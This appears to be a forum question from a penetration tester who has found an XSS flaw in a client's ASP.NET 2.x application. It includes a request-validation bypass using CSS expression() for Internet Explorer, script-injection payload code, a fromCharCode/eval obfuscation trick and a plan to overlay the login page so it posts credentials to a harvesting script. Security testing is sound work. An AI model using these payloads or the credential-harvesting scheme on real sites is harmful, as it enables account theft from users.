I've identified an XSS in a client's application where they've failed to properly sanitize a variable. The application, however, is written in ASP.NET 2.x and they have request validation turned on.
I'm aware of the below string, which will bypass request validation and work on IE:
‹%tag style="xss:expression(alert(123))" ›
What I want to do though, rather than show the client a simple alert box, is to use the XSS to dynamically generate a full screen iframe of the app's login page and change it's post action to a credential harvesting script I host myself.
I have the code to generate this iframe and I know it works. What I'm struggling with is getting a JavaScript function to execute from within the tag style attribute. I thought the best way to achieve this would be to dynamically generate a <script src=..> node in the DOM. However, even though the code definitely works, it won't execute from within the tag style attribute.
So any suggestions on how to get proper JavaScript code execution from within a style attribute? Here is my current code (which isn't working):
<%tag style="xss:expression(
function init()
{
var nBody = document.getElementsByTagName('body')[0];
var newInclude = document.createElement('script');
newInclude.setAttribute('src','src.js');
nBody.appendChild(newInclude);
}
onload=init;
)">
Edit: thought I'd also add that this code work when converted to unicode:
function test(){alert(1);}test();
<IMG STYLE="xss:expression(eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 116, 101, 115, 116, 40, 41, 123, 97, 108, 101, 114, 116, 40, 49, 41, 59, 125, 116, 101, 115, 116, 40, 41, 59)))">
